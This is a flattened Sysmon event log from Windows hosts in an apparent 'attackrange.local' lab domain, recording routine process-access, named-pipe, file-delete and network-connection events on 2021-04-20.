10341000x800000000000000077847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+d7a69|C:\Windows\System32\SHELL32.dll+d7a09|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802548EC8C8)|UNKNOWN(FFFFF40710BB4A38)|UNKNOWN(FFFFF40710BAF6E5)|UNKNOWN(FFFFF40710BB0C0A)|UNKNOWN(FFFFF40710BAEEC6)|UNKNOWN(FFFFF80254603E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+58ac4|C:\Windows\System32\SHELL32.dll+58807|C:\Windows\System32\SHELL32.dll+554f5 10341000x800000000000000077846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+5c6b3|C:\Windows\System32\SHELL32.dll+57217|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56f8f|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56efa|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.264{A7A01FEF-C0A6-607E-8105-00000000BB01}8365316C:\Windows\Explorer.EXE{A7A01FEF-DF97-607E-4709-00000000BB01}6584C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56ed6|C:\Windows\System32\SHELL32.dll+58888|C:\Windows\System32\SHELL32.dll+554f5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+592ea|C:\Windows\System32\SHELL32.dll+dac5a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.217{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EBFC-607E-150E-00000000BB01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.217{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBFC-607E-150E-00000000BB01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.217{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EBFC-607E-150E-00000000BB01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000077838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.219{A7A01FEF-EBFC-607E-150E-00000000BB01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000077837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.201{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.154{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000077825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.139{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI6AFE.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000077824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.139{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.076{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFC-607E-140E-00000000BB01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.061{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBFC-607E-140E-00000000BB01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.061{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFC-607E-140E-00000000BB01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000077818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.014{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFC-607E-130E-00000000BB01}1980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000077817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:04.014{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI6A03.tmpMD5=FCCDC45CA17E5180B40EFC28052BAC39,SHA256=4AB37B0F9C5FE3505E1ECFE0764AAA04838CF81F9E0A402425E057F7A251E621,IMPHASH=620AD7AB8901854C91622E052544AEE7truetrue 18141800x800000000000000077816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:04.014{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.998{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFC-607E-130E-00000000BB01}1980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.998{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFC-607E-130E-00000000BB01}1980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000050469Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:04.666{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DB7173C5E37CAB59523E63A8CFEAC993,SHA256=4DE493E80EB9ED925CDAB9F0F3C9970FA81800EC561AFA34C9269CB33BDD1F7C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050468Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:02.528{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-60541-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050467Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:04.275{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98A307504D534F68A87A946743042975,SHA256=E617DEB7DFF10D2308873AF618D3811E8B89FD17A2CEA90EBD53E356CE62E556,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000078026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:05.904{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472NT AUTHORITY\SYSTEMC:\Program Files\Microsoft Office\root\integration\integrator.exeC:\Windows\Temp\WIN-DC-339-20210420-1458.logMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000078022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.873{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.779{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.779{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.779{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:05.779{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 